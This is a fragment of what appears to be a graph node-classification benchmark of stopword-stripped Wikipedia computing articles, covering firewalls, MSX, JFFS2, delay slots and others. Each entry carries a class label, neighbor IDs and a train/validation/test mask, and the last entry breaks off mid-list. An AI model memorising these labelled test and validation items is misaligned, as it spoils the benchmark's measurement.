    "text": "Firewall_(computing):firewall computing computing firewall network security system monitors controls incoming outgoing network traffic based predetermined security rules firewall typically establishes barrier trusted internal network untrusted external network internet firewalls often categorized either network firewalls host-based firewalls network firewalls filter traffic two networks run network hardware host-based firewalls run host computers control network traffic machines term firewall originally referred wall intended confine fire within building later uses refer similar structures metal sheet separating engine compartment vehicle aircraft passenger compartment term applied late 1980s network technology emerged internet fairly new terms global use connectivity predecessors firewalls network security routers used late 1980s separated networks one another thus halting spread problems one network another first reported type network firewall called packet filter packet filters act inspecting packets transferred computers packet match packet filter set filtering rules packet filter either drops silently discards packet rejects packet discards generates internet control message protocol notification sender else allowed pass packets may filtered source destination network addresses protocol source destination port numbers bulk internet communication 20th early 21st century used either transmission control protocol tcp user datagram protocol udp conjunction well-known ports enabling firewalls era distinguish thus control specific types traffic web browsing remote printing email transmission file transfer unless machines side packet filter used non-standard ports first paper published firewall technology 1988 engineers digital equipment corporation dec developed filter systems known packet filter firewalls bell labs bill cheswick steve bellovin continued research packet filtering developed working model company based original first generation architecture 1989–1990 three colleagues bell laboratories dave presotto janardan sharma kshitij nigam developed second generation firewalls calling circuit-level gateways second-generation firewalls perform work first-generation predecessors also maintain knowledge specific conversations endpoints remembering port number two ip addresses using layer 4 transport layer osi model conversation allowing examination overall exchange nodes type firewall potentially vulnerable denial-of-service attacks bombard firewall fake connections attempt overwhelm firewall filling connection state memory marcus ranum wei xu peter churchyard released application firewall known firewall toolkit fwtk october 1993 became basis gauntlet firewall trusted information systems key benefit application layer filtering understand certain applications protocols file transfer protocol ftp domain name system dns hypertext transfer protocol http useful able detect unwanted application service attempting bypass firewall using disallowed protocol allowed port detect protocol abused harmful way 2012 so-called next-generation firewall ngfw wider deeper inspection application layer example existing deep packet inspection functionality modern firewalls extended include firewalls generally categorized network-based host-based network-based firewalls positioned gateway computers lans wans intranets either software appliances running general-purpose hardware hardware-based firewall computer appliances firewall appliances may also offer functionality internal network protect acting dhcp vpn server network host-based firewalls positioned network node control network traffic machines host-based firewall may daemon service part operating system agent application endpoint security protection advantages disadvantages however role layered security firewalls also vary type depending communication originates intercepted state communication traced network layer firewalls also called packet filters operate relatively low level tcp/ip protocol stack allowing packets pass firewall unless match established rule set firewall administrator may define rules default rules may apply term packet filter originated context bsd operating systems network layer firewalls generally fall two sub-categories stateful stateless commonly used packet filters various versions unix ipfw freebsd mac os x 10.7 npf netbsd pf mac os x 10.4 openbsd bsds iptables ipchains linux ipfilter application-layer firewalls work application level tcp/ip stack i.e. browser traffic telnet ftp traffic may intercept packets traveling application application firewalls function determining whether process accept given connection application firewalls accomplish function hooking socket calls filter connections application layer lower layers osi model application firewalls hook socket calls also referred socket filters application firewalls work much like packet filter application filters apply filtering rules allow/block per process basis instead filtering connections per port basis generally prompts used define rules processes yet received connection rare find application firewalls combined used conjunction packet filter also application firewalls filter connections examining process id data packets rule set local process involved data transmission extent filtering occurs defined provided rule set given variety software exists application firewalls complex rule sets standard services sharing services per-process rule sets limited efficacy filtering every possible association may occur processes also per-process rule sets defend modification process via exploitation memory corruption exploits limitations application firewalls beginning supplanted new generation application firewalls rely mandatory access control mac also referred sandboxing protect vulnerable services proxy server running either dedicated hardware software general-purpose machine may act firewall responding input packets connection requests example manner application blocking packets proxy server gateway one network another specific network application sense functions proxy behalf network user proxies make tampering internal system external network difficult misuse one internal system would necessarily cause security breach exploitable outside firewall long application proxy remains intact properly configured conversely intruders may hijack publicly reachable system use proxy purposes proxy masquerades system internal machines use internal address spaces enhances security crackers may still employ methods ip spoofing attempt pass packets target network firewalls often network address translation nat functionality hosts protected behind firewall commonly addresses private address range defined rfc 1918 firewalls often functionality hide true address computer connected network originally nat function developed address limited number ipv4 routable addresses could used assigned companies individuals well reduce amount therefore cost obtaining enough public addresses every computer organization although nat considered security feature hiding addresses protected devices become often used defense network reconnaissance",
    "neighbors": [
      2049,
      10242,
      10245,
      2060,
      6162,
      10269,
      2084,
      2090,
      10283,
      10297,
      64,
      6209,
      4163,
      4165,
      2118,
      8267,
      10331,
      94,
      107,
      8308,
      6262,
      127,
      131,
      4229,
      2196,
      4245,
      4247,
      10392,
      156,
      2213,
      170,
      10417,
      2228,
      2238,
      4287,
      10433,
      8386,
      8387,
      10451,
      2262,
      6360,
      4314,
      6364,
      225,
      6371,
      6373,
      4344,
      10492,
      6401,
      8451,
      8464,
      274,
      2324,
      278,
      6431,
      10530,
      10531,
      10539,
      300,
      4414,
      331,
      4430,
      8526,
      10574,
      6481,
      4435,
      6490,
      2409,
      2415,
      4464,
      6516,
      2426,
      4475,
      2430,
      8574,
      4480,
      6541,
      8591,
      4504,
      2462,
      4511,
      8622,
      6579,
      6588,
      4552,
      2508,
      467,
      10708,
      4568,
      4571,
      8668,
      8669,
      488,
      2539,
      4589,
      6643,
      2558,
      8703,
      2563,
      10756,
      550,
      10790,
      6699,
      8753,
      569,
      10823,
      6735,
      8797,
      10845,
      612,
      8816,
      4725,
      6773,
      10872,
      4733,
      6786,
      6797,
      2721,
      10924,
      2739,
      4797,
      704,
      8904,
      10952,
      4814,
      6866,
      740,
      4843,
      10987,
      8943,
      4863,
      8978,
      4883,
      6935,
      4892,
      4895,
      823,
      829,
      11073,
      836,
      2887,
      6992,
      849,
      850,
      6993,
      9048,
      4953,
      2907,
      4956,
      7003,
      7012,
      11112,
      4972,
      877,
      7031,
      11134,
      11135,
      899,
      7044,
      9102,
      11158,
      7065,
      11162,
      9117,
      2975,
      5025,
      2985,
      7082,
      939,
      11184,
      7089,
      11189,
      9145,
      11197,
      7102,
      3007,
      11198,
      5057,
      9160,
      7121,
      11221,
      3032,
      5085,
      9187,
      5093,
      11244,
      7150,
      9202,
      3072,
      9227,
      9233,
      3094,
      9242,
      7208,
      9256,
      5178,
      5179,
      9279,
      1088,
      5202,
      9318,
      7289,
      5245,
      5246,
      11400,
      1164,
      9356,
      1172,
      11413,
      5281,
      7336,
      3243,
      1200,
      1208,
      3262,
      7364,
      11461,
      7368,
      5325,
      5327,
      9423,
      7383,
      11486,
      9440,
      9442,
      3299,
      11502,
      7407,
      3320,
      1273,
      5373,
      1279,
      1286,
      9485,
      9488,
      7441,
      9496,
      5402,
      5404,
      5405,
      5407,
      3381,
      5433,
      11577,
      3395,
      11594,
      1355,
      1361,
      7515,
      11621,
      11622,
      5491,
      5492,
      9591,
      9607,
      11659,
      5516,
      7568,
      3473,
      3482,
      5531,
      1436,
      3500,
      9646,
      11698,
      3521,
      3525,
      9671,
      9677,
      9684,
      9688,
      5608,
      9715,
      9727,
      5636,
      5657,
      9761,
      3620,
      7717,
      9766,
      9771,
      3629,
      7729,
      9779,
      3643,
      7739,
      9791,
      9806,
      1634,
      1637,
      9834,
      5761,
      5764,
      9868,
      3732,
      1690,
      5799,
      3755,
      1708,
      7855,
      3781,
      9930,
      7893,
      9954,
      5860,
      3815,
      9971,
      5887,
      1792,
      9983,
      3845,
      10000,
      3857,
      7960,
      3867,
      7967,
      5924,
      7979,
      3885,
      3887,
      7983,
      1858,
      5972,
      3930,
      3935,
      1891,
      3941,
      3942,
      8039,
      3962,
      6018,
      6024,
      10141,
      1961,
      1970,
      4023,
      6080,
      4033,
      1993,
      4054,
      10210,
      4068,
      4074,
      10232,
      2041
    ],
    "mask": "None"
  },
  {
    "node_id": 8999,
    "label": 9,
    "text": "Data_General_Business_Basic:data general business basic data general business basic basic interpreter based mai basic four version developed data general nova minicomputer 1970s later ported data general eclipse mv aviion computers business applications nova developed business basic business basic integer-only language inspired cobol contained powerful string-handling functions ability manipulate indexed files quickly also provided full control display screen cursor positioning attribute setting region-blanking commands business basic could interface data general infos ii database make calls directly operating system lock server gave multiple concurrent users efficient access database records small business programs could developed debugged rapidly business basic interactive nature interpreter language provide many structured programming features programs grew larger maintenance became problem limited memory space business basic programs nova programmers often resorted tricks self-modifying programs easy program business basic complicated debug original version language double precision i.e 32-bit integer used two 16-bit nova words data general ported language mv line included two copies language one double precision one triple precision unfortunately two incompatible subtle ways although data general improved language ways adding multiple-line else end statements failed lift many constraints language mv machines 9,999 line maximum 384 variable limit maximum 16 open files early competitor data general business basic bluebird business basic compiled language running proprietary superdos bluebird platform bluebird basic fully compatible data general b32 business basic highly compatible interpreter ran eclipse mv line lifted many data general business basic constraints ran significantly faster using full power 32-bit processor b32 stored variables internally 64-bit emulated double triple precision required also provided new language features b32 ported unix later dos allowing data general customers readily move hardware vendors b32 also substantial compatibility bluebird business basic transoft produced another competitor data general business basic universal business basic ubb ran unix dos substantially compatible data general business basic transoft purchased b32 1992 data general ported business basic aviion b32 ubb already available platform data general programmers one major success aviion unveiled new version business basic shootout b32 ubb data general added caching mechanism speed business basic disk access outperformed companies products within month b32 ubb added caching mechanisms drawn ahead data general transoft ubb sold universal business language",
    "neighbors": [
      8902,
      9608,
      4394,
      7983,
      5492
    ],
    "mask": "None"
  },
  {
    "node_id": 9000,
    "label": 4,
    "text": "Cyber_Intelligence_House:cyber intelligence house cyber intelligence house formerly kinkayo singapore-based cyber intelligence agency specializes cyber exposure company detects monitors cyber exposure via dark web deep web data breaches alert individuals businesses potential cyber threats cyber exposure index cei company research-driven project world first proprietary global scoring system calculates exposure index listed companies based exposed credentials hacker-group activity leaked sensitive information cei sort cyber risk score given public companies listed stock exchanges hosted 11 countries australia finland germany hong kong indonesia italy south africa uk usa malaysia singapore cei scores 6,000 listed companies levels exposure analysing data collected company publicly available sources dark web deep web published data breaches companies evaluated given score ranging 0 300+ 0 indicating exposure past 12 months 300+ indicating company represent top 10 exposed companies globally index first launched october 2017 results concluded publicly listed companies australia hong kong singapore least exposed cyber threats october 2018 results updated singapore malaysia indonesia earmarked least exposed countries world also led speculation cyber threat exposure location centric asia pacific firms tend lower exposure american eu counterparts cei faced negative press south africa ranked 3rd exposed country october 2017 south african banking risk information centre sabric speculated research findings may cause unnecessary fear uncertainty doubt hacked cyber exposure monitoring app individuals launched june 2018 company aim android application alert people whenever sensitive information compromised provides free e-mail account monitoring however premium plan subscription users monitor credit cards usernames id numbers physical addresses well",
    "neighbors": [
      1251,
      1897,
      4689,
      2779,
      4830
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9001,
    "label": 8,
    "text": "Halalgoogling:halalgoogling halalgoogling islamic internet search engine holy month ramadan halalgoogling used block content deemed haram sharia law collects results web search engines google bing presents halal results users",
    "neighbors": [
      8554,
      2045,
      5470,
      735
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9002,
    "label": 9,
    "text": "Compilers:_Principles,_Techniques,_and_Tools:compilers principles techniques tools compilers principles techniques tools computer science textbook alfred v. aho monica s. lam ravi sethi jeffrey d. ullman compiler construction first published 1986 widely regarded classic definitive compiler technology text affectionately known dragon book generations computer scientists cover depicts knight dragon battle metaphor conquering complexity name also refer aho ullman older principles compiler design first edition 1986 informally called red dragon book distinguish second edition aho ullman ’ 1977 principles compiler design sometimes known green dragon book topics covered first edition include following tradition two predecessors second edition 2006 features dragon knight cover informally known purple dragon monica s. lam stanford university became co-author edition second edition includes several additional topics including",
    "neighbors": [
      512,
      1952,
      2304,
      2817,
      5635,
      8262,
      1610,
      5418,
      2316,
      3468,
      655,
      2065,
      3413,
      11574,
      5464,
      2620,
      6047
    ],
    "mask": "Test"
  },
  {
    "node_id": 9003,
    "label": 3,
    "text": "Delay_slot:delay slot computer architecture delay slot instruction slot gets executed without effects preceding instruction common form single arbitrary instruction located immediately branch instruction risc dsp architecture instruction execute even preceding branch taken thus design instructions appear execute illogical incorrect order typical assemblers automatically reorder instructions default hiding awkwardness assembly developers compilers branch instruction involved location following delay slot instruction pipeline may called branch delay slot branch delay slots found mainly dsp architectures older risc architectures mips pa-risc etrax cris superh sparc risc architectures single branch delay slot powerpc arm alpha risc-v dsp architectures single branch delay slot include vs dsp µpd77230 tms320c3x sharc dsp mips-x use double branch delay slot processor execute pair instructions following branch instruction branch takes effect following example shows delayed branches assembly language sharc dsp registers r0 r9 cleared zero order number register cleared r6 r7 r9 instruction executes goal pipelined architecture complete instruction every clock cycle maintain rate pipeline must full instructions times branch delay slot side effect pipelined architectures due branch hazard i.e fact branch would resolved instruction worked way pipeline simple design would insert stalls pipeline branch instruction new branch target address computed loaded program counter cycle stall inserted considered one branch delay slot sophisticated design would execute program instructions dependent result branch instruction optimization performed software compile time moving instructions branch delay slots in-memory instruction stream hardware supports another side effect special handling needed managing breakpoints instructions well stepping debugging within branch delay slot ideal number branch delay slots particular pipeline implementation dictated number pipeline stages presence register forwarding stage pipeline branch conditions computed whether branch target buffer btb used many factors software compatibility requirements dictate architecture may change number delay slots one generation next inevitably requires newer hardware implementations contain extra hardware ensure architectural behavior followed despite longer relevant load delay slot instruction executes immediately load register memory see need wait result load load delay slots uncommon load delays highly unpredictable modern hardware load may satisfied ram cache may slowed resource contention load delays seen early risc processor designs mips isa implemented r2000 r3000 microprocessors suffers problem following example mips assembly code showing load delay slot branch delay slot",
    "neighbors": [
      9739,
      783,
      1298,
      8861,
      10013,
      10781,
      1952,
      10786,
      6181,
      8231,
      936,
      7852,
      10796,
      9391,
      2224,
      4144,
      8501,
      7234,
      3142,
      9932,
      7505,
      477,
      6250,
      9964,
      5358,
      8944,
      4596,
      1399,
      3451,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 9004,
    "label": 6,
    "text": "JFFS2:jffs2 journalling flash file system version 2 jffs2 log-structured file system use flash memory devices successor jffs jffs2 included linux kernel since september 23 2001 merged linux kernel mainline part kernel version 2.4.10 release jffs2 also available bootloaders like das u-boot open firmware ecos rtos rtems rtos redboot prominent usage jffs2 comes openwrt least three file systems developed jffs2 replacements logfs ubifs yaffs jffs2 introduced jffs changes files directories logged flash nodes two types jffs nodes start valid created become obsolete newer version created elsewhere unlike jffs however circular log instead jffs2 deals blocks unit size erase segment flash medium blocks filled one time nodes bottom clean block one contains valid nodes dirty block contains least one obsolete node free block contains nodes garbage collector runs background turning dirty blocks free blocks copying valid nodes new block skipping obsolete ones done erases dirty block tags special marker designating free block prevent confusion power lost erase operation make wear-levelling even prevent erasures concentrated mostly-static file systems garbage collector occasionally also consume clean blocks due log-structured design jffs2 disadvantages include following",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      4634,
      3611,
      5661,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      10851,
      4708,
      8298,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      10451,
      728,
      8410,
      6365,
      739,
      7907,
      4841,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      2304,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      302,
      7983,
      11568,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      4581,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 9005,
    "label": 3,
    "text": "Nemesis_2_(MSX):nemesis 2 msx departure games instead controlling vic viper available ship called metalion unlike titles game heavier focus story told cut-scenes gameplay mostly unchanged rest series though powerups temporally gives ship enhancements also bosses defeated metalion flies mini-level accessed order obtain new permanent upgrades mini levels successfully cleared director general space science agency dr. venom exiled planet sard failed coup d'état year 6665 escapes invades planet nemesis seven planets controls help bacterion nemesis high council sends james burton ex-pilot vic viper pilot metalion attack dr. venom bacterion invaders game takes place year 6666 sharp x68000 port essentially enhanced remake nemesis 2 graphical quality par gradius iii br includes two new stages exclusive version game 4 new bosses two replace rematches fought msx version aside remade nemesis '90 kai nemesis 2 also ported mobile phones 2006 sony psp 2007 part salamander portable collection re-released wii virtual console 2009 project egg 2015 wii u virtual console 2016 japan",
    "neighbors": [
      2498,
      9006,
      10931,
      4405,
      4317,
      9247
    ],
    "mask": "None"
  },
  {
    "node_id": 9006,
    "label": 3,
    "text": "MSX:msx msx standardized home computer architecture announced microsoft june 16 1983 conceived marketed kazuhiko nishi vice-president microsoft japan director ascii corporation nishi conceived project attempt create unified standards among various home computing system manufacturers period msx systems popular japan several countries difficult determine many msx computers sold worldwide eventually 5 million msx-based units sold japan alone despite microsoft involvement msx-based machines released united states great success nintendo family computer msx platform major japanese game studios konami hudson soft produced video games metal gear series example first written msx hardware exact meaning msx abbreviation remains matter debate 2001 kazuhiko nishi recalled many assumed derived microsoft extended referring built-in microsoft extended basic msx basic specifically adapted microsoft msx system others believed stood matsushita-sony however said team original definition machines software exchangeability conflicts earlier explanation 1985 named msx mx missile early 1980s home computers manufactured japan nec pc-6001 pc-8000 series fujitsu fm-7 fm-8 hitachi basic master featured variant microsoft basic interpreter integrated on-board roms hardware design computers various dialects basics incompatible japanese consumer electronics firms panasonic canon casio yamaha pioneer sanyo searching ways enter new home computer market nishi proposed msx attempt create single industry standard home computers inspired success vhs standard video cassette recorders many japanese electronic manufacturers along goldstar philips spectravideo built promoted msx computers piece hardware software msx logo compatible msx products manufacturers particular expansion cartridge form function part standard msx expansion game cartridge would work msx computer nishi standard built around spectravideo sv-328 computer standard consisted primarily several off-the-shelf parts main cpu 3.58 mhz zilog z80 texas instruments tms9918 graphics chip 16 kb dedicated vram sound partial i/o support provided ay-3-8910 chip manufactured general instrument gi intel 8255 programmable peripheral interface chip used parallel i/o keyboard choice components shared many home computers games consoles period colecovision home computer emulator later available msx systems could run software sega sg-1000 video game system reduce overall system cost many msx models used custom ic known msx-engine integrated glue logic 8255 ppi ym2149 compatible soundchip sometimes even z80 cpu however almost msx systems used professional keyboard instead chiclet keyboard driving price compared original sv-328 consequently components alongside microsoft msx basic made msx competitive though somewhat expensive home computer package 27 june 1983 msx formally announced press conference slew big japanese firms declared plans introduce machines japanese companies avoided intensely competitive u.s. home computer market throes commodore-led price war spectravideo yamaha briefly marketed msx machines u.s. spectravideo msx enjoyed little success yamaha cx5m model built interface various types midi equipment billed digital music tool standard personal computer 1980s europe became largest computer games market opposed console games world extremely popular commodore 64 atari 8-bit sinclair zx spectrum computers dominated time msx launched europe several popular 8-bit home computers also arrived far late capture extremely crowded european 8-bit computer market problem game software developers method msx-1 computers addressed video ram could quite slow compared systems gave direct access video memory fact completely different features msx-1 video chip using msx video access method compensate slower video access efficiently used porting mostly spectrum software made msx-1 appear slower running ported games minor compatibility issues also plagued ported spectrum games example toshiba hx-10 machine unable read certain key combinations time preventing spectrum standard q p steering whereas machines manufacturers worked fine later ported games tended use msx-1 joystick port used msx official arrow keys space bar offered option choose keys control program solving problem larger problem designers msx standard bank switching protocol prescribe hardware manufacturers banks cartridges importantly ram found moreover msx bios provide information either thus requiring programmers implement complex routines find resources often programmers assumed ram cartridges would available default bank switch location reality systems ram cartridge slot default location another bank switch location i.e toshiba hx-20 cases programs failed run saw 32 kb available memory instead full 64 kb almost msx-1 machines offered mainstream msx-1 machines offered least full 64 kb ram exceptions early phillips msx-1 models vg8000 offered 16 kb ram vg8010 32 kb casio pv-7 low budget msx targeted playing games 8 kb msx spawned four generations msx 1983 msx2 1985 msx2+ 1988 msx turbor 1990 first three 8-bit computers based z80 microprocessor msx turbor based custom 16-bit r800 microprocessor developed ascii corporation time msx turbor standard announced 1990 panasonic manufacturing msx computers initial model fs-a1st met moderate success upgraded model fs-a1gt introduced 1991 sold poorly due high retail cost 99800 yen production turbor ended 1993 panasonic decided focus release 3do msx3 scheduled market 1990 delays development vdp—then named v9978 pre-release spec sheets—caused yamaha miss time market deadline place improved msx2+ released msx turbor features new r800 processor dma 24-bit addressing disabled vdp eventually delivered two years planned deadline time market moved attempt reduce financial loss yamaha stripped nearly v9958 compatibility marketed resulting v9990 e-vdp iii video-chipset pc vga graphic cards moderate success sony also employed v7040 rgb encoder chip many products msx-fan magazine also mentions impressive power v9990 able compete much expensive hardware sharp x68000 japan south korea argentina brazil msx paramount home computer system 1980s also quite popular continental europe especially netherlands spain uk hand popular affordable model toshiba hx-10p msx computer commonly seen available around entire nation france italy enjoyed moderate success philips vg-8020 computer much impact netherlands spain italy belgium france canon v-20 affordable n't much success impact like amstrad cpc thomson to7/mo5 series computers classrooms full networked yamaha msx used teaching informatics schools arab countries soviet union cuba wildly popular government education schools centers however msx never took u.s. canada mexico china taiwan hong kong denmark singapore malaysia philippines indonesia czech republic hungary poland serbia bulgaria romania south africa india portugal never became worldwide standard makers envisioned msx lack success markets became apparent us manufacturer commodore business machines overhauled product line early 1980s introduced models plus/4 commodore 16 intended better compete features msx computers cuban government moved modernize studies computer systems 1985 higher pedagogical institutes schools pre-university education supplied toshiba panasonic msx systems resident msx basic language popularly known intelligent keyboards proved useful minister education continued process installing similar systems throughout secondary junior high centers finalized elementary schools adult education institutions newly nationwide formed “ computer electronic youth clubs ” 1987 forming computer clubs allowed cuban government interest educate common citizen computer subjects since selling systems personal private computer public banned see censorship cuba 1980s sakhr صخر computers developed al alamiah kuwaiti company started production first arabic version msx computers started producing yamaha ax100 models including msx2 msx2+ popular affordable model within arab states persian gulf sakhr msx ax170 also first arabise basic msx logo al-alamiah produced common models including ax100 ax123 ax150 ax170 ah200 ax200 ax230 ax235 ax250 ax330 ax350-i ax350-ii ax355 ax370 ax500 ax550 ax660 ax990 msx console famicom game slot msx computer ax330 user switch msx famicom modes pressing button back computer variants compatible sega mega drive ax660 ax990 sega master system pal cartridges playable ax660 ax990 tv game computer cartridge converter master system converter attached time connecting sega master system cartridge game inlet computer attaching master system converter play sega master cartridges ax660 ax990 possible inlet depth physical shape master system converter prevent converter attached correctly ax660 ax990 computers many msx computers used 1980s former eastern bloc countries tool subtitling pirated films vhs betamax cassettes msx computers used simplicity ability display prepared titles real time superimposed text mastering tapes msx arrived argentina late 1984 popular model talent msx dpc-200 based daewoo msx dpc-200 models spectravideo svi 728 svi x´press 3.5 built-in drive later came toshiba smaller numbers gradiente models brazil late 1987 talent presented msx2 tpc-310 ´turbo´ argentine market ´turbo´ name referring msx2+ also based daewoo design msx highly successful computer argentina commodore 64 thanks use education national level msx-logo language widely used schools msxii+ never made market argentina msx production ceased 1990 total 9 million msx computers sold japan making relatively popular still global standard intended comparison rival 8-bit computers commodore 64 sold 17 million units worldwide lifetime apple ii sold 6 million units zx spectrum 5 million units atari 8-bit sold least 4 million units amstrad cpc sold 3 million units tandy trs-80 model 1 sold 250,000 units sony msx2 machine launched space board russian mir spacecraft one professional broadcast video workstation based sony hitbit hb-f900 msx2 computer system msx closely resembled spectravideo sv-328 home computer spectravideo even claimed msx compatible advertisements actual launch msx systems fact completely compatible led new short-lived kind software cracking converting since msx games unplayable sv-328 computer sv-328 crackers developed method modifying msx games make work sv-328 cases included downloading msx bios sv-328 tape floppy disk spectravideo later launched svi-728 completely adhered msx standard sega sg-1000 memotech mtx colecovision many similarities msx1 standard none really compatible porting games systems somewhat easy also common port games zx spectrum msx since cpu spectrum 128 soundchip zx spectrum graphic mode could easily emulated msx screen-2 mode default msx machines hardcoded character set keyboard scan code handling algorithm msx full application software compatibility firmware bios level due minor hardware differences replacement bios another different pc may render incorrect scan code translations thus incorrect behaviour keyboard subsystem application software 2011 age labs introduced language pack firmware aiming make model support several localizations default installed gr8bit instead kanji-rom allows changing character set keyboard layout machine startup allowed changing japanese russian international portuguese locales ability change locales machine operation using newly introduced basic command lang selected locale setting stored unused rtc nvram memory space 2001 kazuhiko nishi initiated 'msx revival around official msx emulator called msxplayer official msx emulator msx copyrights maintained msx association 2004 dutch company bazix announced become representatives msx association europe english contact questions regarding msx trademarks copyrights licensing october 17 2006 bazix launched woomb.net website selling msx games english languages selection 14 games japan game sales began earlier project egg woomb.net english counterpart japanese services offered d4 enterprise also announced august 2006 launch new msx2 compatible system called one chip-msx system based altera cyclone ep1c12q240c8 fpga one chip-msx similar concept c-one commodore 64 clone also built basis single fpga chip new msx system housed box made transparent blue plastic used standard monitor tv pc keyboard two msx cartridge slots supports audio extensions msx-music scc+ sd/mmc-flashcard used external storage medium emulating disk drive used boot msx-dos due vhdl programmable hardware possible give device new hardware extensions simply running reconfiguration program msx-dos one chip-msx also two usb connectors used adding supporting vhdl code june 7 2008 msx resource center foundation reported msx trademark moved msx association msx licensing corporation referring benelux trademark register page msx names msx licensing corporation entitled entity till 28-10-2013 time website msx licensing corporation linked source text saying 'we planning revitalize msx innovative computer platform however website later changed contain logo itny partners link itny partners english japanese websites mention msx licensing corporation bazix reported website front page longer representative msx association due unable achieve goals bringing commercial msx revival beyond japanese borders transfer msx trademark msx association msx licensing corporation outlook progress western one chip msx project time soon result woomb.net taken offline well website redirecting bazix website solution free msx association contributions completed according post cooperate d4 enterprise msx licensing corporation one retro gaming related projects july 4 2008 msx association european contact website states official contact place msx association europe reports msx trademark copyright msx licensing corporation holding ever since 1983 explains msx association chaired dr. kazuhiko nishi operational division msx licensing corporation manages trademarks logo copyrights msx according article d4 enterprise refuse pay royalties msx association use ese artists factory work 1chipmsx software licenses project egg thus deal kazuhiko nishi 'directly msx licensing corporation article mentions well ese msx system 3 1chipmsx also known one chip msx ocm based july 5 2008 msx association europe website posted announcement reporting d4 enterprise selling 1chipmsx illegally post stated bazix longer representative europe due bazix cutting relationship 2011 age labs announced launch msx kit called gr8bit do-it-yourself computer learning purposes licensed msx licensing corporation kit priced 499 includes necessary components assemble working msx2 compatible computer except atx chassis power supply floppy drive hard disk ps/2 keyboard monitor also comes assembly operational manuals supplement compiled vendor community support gr8bit engineering community korean forum members made zemmix neo created new version msx called mini iq3000 cutie similar features iq-2000 msx2 made korea daewoo electronics based 1chipmsx special features like 'scan line generator 'multi language support scan line generator generates scan lines show msx screen better quality supports 2 languages time normally shows korean font working korean version msx pressing 'del key booting changes japanese mode even though default mode korean default font allocation table japanese shows japanese characters executing japanese version software popular famous msx games written japanese software-houses konami hudson soft several popular video game franchises initially established msx others received various installments msx including several titles unique system largely reworked versions games formats note clones unlicensed equipment keyboard functionally separate unit could connected non-multiplexed multiplexed interfaces multiplexed keyboard units feature additional data direction line allowing sending scan line number keyboard using data lines used return scan code decreasing overall number wires keyboard machine non-multiplexed interface usually used internal keyboards external keyboards like panasonic cf-3300 multiplexed interface used external keyboards e.g yamaha yis805 model keyboard organized matrix maximum 11 input lines 8 output lines accounting maximum 88 keys including control numerical alphanumerical keys scan line regularly queried identify state keys line query speed identified system interrupt frequency organization allows system sense state key exhibiting notorious problem 8042 microcontroller-based keyboards pressing several keys simultaneously usually 3 generates wrong input characters renders inability sense press keys due keyboard scan controlled system interrupts one troubleshooting hints msx machine display image assuming power present press caps key see respective led toggles toggle system likely suffering serious problem lack image screen i.e problem video cable video display interface overall 2009 kamil karimov designed adapter board connect ps/2 keyboard multiplexed msx keyboard interface firmware embedded attiny chip tailored daewoo cpc machines 2011 age labs embedded ps/2 keyboard controller unit based microchip microcontroller gr8bit do-it-yourself machine firmware developed directly convert ps/2 scan codes msx keyboard scan codes thus fully transparent applications allowing use controller unit different msx-compatible machines different localization setups msx standard requires least 1 cartridge slot msx models 2 slots interchangeable cases makes difference slot cartridge inserted physical connector 50 pin 2 x 25 contacts standard 2.54 mm 0.1 inch pitch edge connector using cartridge slots wide variety peripherals could connected regular game cartridges size audio cassette so-called konami size despite higher cost popular format due reliability ease use around 1985 hudson soft released credit card-sized bee card meant cheaper convenient alternative rom cartridges commercial failure titles released format source files development msx cartridges available age labs eagle msx systems generally built-in disk drive games published mainly cartridge cassette tape sony created battery backed ram cartridge hbi-55 data cartridge computers hit-bit line msx systems could used store programs data alternative cassette tapes floppy disk drives available msx however form cartridge containing disk interface electronics bios extension rom floppy disk drive interface connected external case drive south-america many systems used floppy disk drive europe drives popular japan msx1 systems included built-in 3.5 disk drive like panasonic previously named matsushita cf-3000 europe range philips msx2 systems nms 8230 8235 8245 8250 featured either 360 720 kb 3.5 floppy drives 1985 msx2 released systems often always included built-in 3.5 disk drive consequently popular media games software shifted floppy disks msx-dos disk operating system internal software mechanisms much like cp/m cp/m software could ported reasonably easily file system compatible ms-dos user commands also similar early ms-dos versions way microsoft could promote msx home use promoting ms-dos based personal computers office environments msx 3.5 floppy disks directly compatible ms-dos although details like file undeletion boot sector code different like ms-dos 1 msx disks formatted msx-dos 1 support subdirectories september 2012 age labs extended standard including support 1.44mb 3.5 ” format 1.44mb diskette size goes two configurations standard 1 sector per cluster 9 fat sectors compatible 4 sectors per cluster 3 fat sectors msx computers emulated many platforms today early msx emulators often based code pioneer fmsx portable msx emulator marat fayzullin many emulators removed fayzullin z80 emulation code entirely later versions avoid legal problems time fmsx n't free software somewhat later fmsx source code became free use non-profit use however license still required commercial use december 31 2013 windows version fmsx 3.7 released free anyone use official msx emulator msxplayer produced msx association inventor msx standard kazuhiko nishi president version 0.146.u mess currently supports 90 percent msx versions february 2007 nintendo japan announced msx games available wii virtual console emulator confirmed games would cost 700 wii points become available middle 2007 also became available wii u december 25 2013 ultimately 13 games mainly konami titles wii plus 1 wii u released service japan",
    "neighbors": [
      8193,
      4102,
      2055,
      8198,
      8199,
      4109,
      4110,
      4112,
      4115,
      22,
      6167,
      6173,
      8223,
      8232,
      10287,
      2096,
      51,
      6196,
      6197,
      8249,
      4164,
      10312,
      2121,
      10328,
      95,
      10339,
      104,
      8300,
      120,
      4216,
      2173,
      126,
      145,
      6292,
      6294,
      2209,
